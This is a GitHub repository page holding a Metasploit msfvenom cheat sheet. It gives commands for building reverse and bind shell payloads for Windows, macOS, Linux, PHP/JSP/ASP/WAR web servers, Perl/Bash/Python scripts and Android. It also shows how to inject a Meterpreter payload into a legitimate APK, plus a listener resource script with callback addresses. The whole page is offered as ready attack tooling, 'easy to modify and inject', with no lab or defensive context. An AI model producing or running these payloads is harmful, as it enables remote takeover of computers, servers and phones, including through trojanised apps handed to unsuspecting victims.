Skip to content

Android and different os payloads easy to modify and inject

Notifications You must be signed in to change notification settings

sajithnilanka/Payloads

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Payloads

Android and different os payloads easy to modify and inject

Cheetsheet Metasploit

Windows Payloads Windows Meterpreter Reverse Shell

 msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f exe > payload-name.exe 

Windows Reverse Shell

 msfvenom -p windows/shell/reverse_tcp lhost=ip-address lport=port -f exe > payload-name.exe 

Windows Encoded Meterpreter Reverse Shell

 msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 2 -f exe > payload-name.exe 

Windows Meterpreter Reverse Shellcode

 msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f < platform  

macOS Payloads macOS Bind Shell

 msfvenom -p osx/x86/shell_bind_tcp rhost=ip-address lport=port-f macho > payload-name.macho 

macOS Reverse Shell

 msfvenom -p osx/x86/shell_reverse_tcp lhost=ip-address lport=port -f macho > payload-name.macho 

macOS Reverse TCP Shellcode

 msfvenom -p osx/x86/shell_reverse_tcp lhost=ip-address lport=port -f < platform  

Linux Payloads Linux Meterpreter TCP Reverse Shell

 msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=ip-address lport=port -f elf > payload-name.elf 

Linux Bind TCP Shell

 msfvenom -p generic/shell_bind_tcp rhost=ip-address lport=port -f elf > payload-name.elf 

Linux Bind Meterpreter TCP Shell

 msfvenom -p linux/x86/meterpreter/bind_tcp rhost=ip-address lport=port -f elf > payload-name.elf 

Linux Meterpreter Reverse Shellcode

 msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=ip-address lport=port -f < platform  

Web-base Payloads PHP Meterpreter Reverse Shell

 msfvenom -p php/meterpreter_reverse_tcp lhost=ip-address LPORT=port -f raw > payload-name.php 

JSP Java Meterpreter Reverse Shell

 msfvenom -p java/jsp_shell_reverse_tcp lhost=ip-address lport=port -f raw > payload-name.jsp 

ASP Meterpreter Reverse Shell

 msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f asp > payload-nmae.asp 

WAR Reverse TCP Shell

 msfvenom -p java/jsp_shell_reverse_tcp lhost=ip-address lport=port -f war > payload-name.war 

Script-Base Payloads Perl Unix Reverse shell

 msfvenom -p cmd/unix/reverse_perl lhost=ip-address lport=port -f raw > payload-name.pl 

Bash Unix Reverse Shell

 msfvenom -p cmd/unix/reverse_bash lhost=ip-address lport=port -f raw > payload-name.sh 

Python Reverse Shell

 msfvenom -p cmd/unix/reverse_python lhost=ip-address lport=port -f raw > payload-name.py 

Android Payloads Android Meterpreter reverse Payload

 msfvenom -p android/meterpreter/reverse_tcp lhost=ip-address lport=port R > payload-name.apk 

Android Bind Meterpreter Payload

 msfvenom -x app.apk -p android/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 -o out.apk 
msfvenom --platform android --arch dalvik -x myApp.apk -p android/meterpreter/reverse_tcp LHOST=192.168** LPORT=7777 -o build.apk

#Save AS explort.rc Run command


# msfconsole -q -r 'export.rc'
# nano export.r
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.1.5
set LPORT 5576
set ExitOnSession false
set EnableStageEncoding true
run -j

..........................................read more

About

Android and different os payloads easy to modify and inject

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published